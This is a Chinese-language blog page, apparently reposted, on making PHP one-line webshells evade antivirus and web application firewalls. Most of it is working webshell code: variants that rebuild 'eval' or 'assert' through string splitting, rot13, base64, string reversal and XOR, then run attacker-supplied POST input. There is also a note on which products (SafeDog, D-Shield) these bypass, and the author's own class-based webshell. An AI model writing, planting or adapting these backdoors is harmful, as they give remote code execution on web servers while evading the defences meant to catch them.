• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号
登陆 注册
描述文字

PHP一句话简单免杀

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

PHP一句话简单免杀

原型

几种已经开源的免杀思路

  • 拆解合并

    <?php
$ch = explode(".","hello.ev.world.a.l");
$c = $ch[1].$ch[3].$ch[4]; //eval
$c($_POST[\'x\']);
?>

  • rot13加密

    <?php
$c=str_rot13(\'n!ff!re!nffreg\');
$str=explode(\'!\',$c)[3];
$str($_POST[\'x\']);
?>

  • rot13+base64

    <?php @eval(str_rot13(base64_decode($_POST[\'ant\'])));?>

  • rot13+base64+倒序

    <?php @eval(str_rot13(base64_decode(strrev($_POST[\'ant\']))));?>

  • 以及自定义蚁剑编码器

  • 经过测试安全狗应该没有对流量进行检测,对其就行编码加密即可绕过,D盾着不行,如果对敏感函数进行简单的重定义函数名,D盾会爆1可疑文件

自己写的简单webshell

<?php
class Test{
    public $name = \'\';
	public $YH_asset;	#assert	
	
	//assert异或转换
	function __construct(){
		$_gwp="Y"^"\x38";                           
		$_uDO="}"^"\xe";                            
		$_ZnM="&"^"\x55";                           
		$_UaW="w"^"\x12";                           
		$_rUJ="b"^"\x10";                           
		$_nND="S"^"\x27";                           
											
		
		$this->YH_asset=$_gwp.$_uDO.$_ZnM.$_UaW.$_rUJ.$_nND;
	}
	
    function __destruct(){
	$YH_asset = $this->YH_asset;
	//assert(_POST[\'css\']);
              @$YH_asset("$this->name");
    }
}

$test= new Test();
$c = @$_POST[\'css\'];
$test->name = $c;
?>

结语

方法很多,我觉得这个webshell还是太长了,也没有太过细致的研究,之后有时间应该会继续学习下。

鲜花
握手
雷人
路过
鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
More+
上一篇:
Windows下Apache+PHP+phpmyadmin的配置发布时间:2022-07-10
下一篇:
php如何openssl_encrypt加密解密发布时间:2022-07-10
热门推荐
More+
热门话题
More+
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap